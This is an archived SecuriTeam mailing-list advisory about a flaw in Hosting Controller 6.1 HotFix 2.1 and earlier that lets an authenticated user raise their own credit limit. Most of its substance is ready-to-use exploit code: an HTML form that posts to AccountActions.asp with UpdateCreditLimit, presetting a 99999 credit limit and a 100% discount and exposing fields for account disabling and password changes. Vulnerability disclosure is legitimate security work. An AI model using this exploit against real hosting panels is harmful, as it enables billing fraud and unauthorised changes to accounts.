|
|
[EXPL] Hosting Controller Change Credit Limit Exploit (AccountActions.asp): msg#00096security.securiteam
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Hosting Controller Change Credit Limit Exploit (AccountActions.asp) ------------------------------------------------------------------------ SUMMARY " <http://hostingcontroller.com/> Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform." Vulnerability in Hosting controller allows an authenticated user to change his/her credit limit. DETAILS Vulnerable Systems: * Hosting Controller version 6.1 HotFix 2.1 and prior. Exploit code: GET CREDIT<br>Soroush Dalili from GSG<br> <form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit"; method="post"> <table> <tr> <td>Username:</td> <td><input type="text" name="UserName" value=""></td> </tr> <tr> <td>Description:</td> <td><input type="text" name="Description" value=""></td> </tr> <tr> <td>FullName:</td> <td><input type="text" name="FullName" value=""></td> </tr> <tr> <td>AccountDisabled 1,[blank]:</td> <td><input type="text" name="AccountDisabled" value=""></td> </tr> <tr> <td>UserChangePassword:</td> <td><input type="text" name="UserChangePassword" value=""></td> </tr> <tr> <td>PassCheck=TRUE,0:</td> <td><input type="text" name="PassCheck" value="0"></td> </tr> <tr> <td>New Password:</td> <td><input type="text" name="Pass1" value=""></td> </tr> <tr> <td>DefaultDiscount%:</td> <td><input type="text" name="DefaultDiscount" value="100"></td> </tr> <tr> <td>CreditLimit:</td> <td><input type="text" name="CreditLimit" value="99999"></td> </tr> </table> <br><input type="submit"> </form> <hr><br> ADDITIONAL INFORMATION The information has been provided by <mailto:Irsdl@xxxxxxxxx> Soroush Dalili. ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. |
|
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| Previous by Date: | [EXPL] GTChat Remote Denial Of Service And Directory Traversal: 00096, SecuriTeam |
|---|---|
| Next by Date: | [NEWS] Cisco IDS Management Software SSL Certificate Validation Vulnerability: 00096, SecuriTeam |
| Previous by Thread: | [EXPL] GTChat Remote Denial Of Service And Directory Traversali: 00096, SecuriTeam |
| Next by Thread: | [NEWS] Cisco IDS Management Software SSL Certificate Validation Vulnerability: 00096, SecuriTeam |
| Indexes: | [Date] [Thread] [Top] [All Lists] |
| News | FAQ | advertise |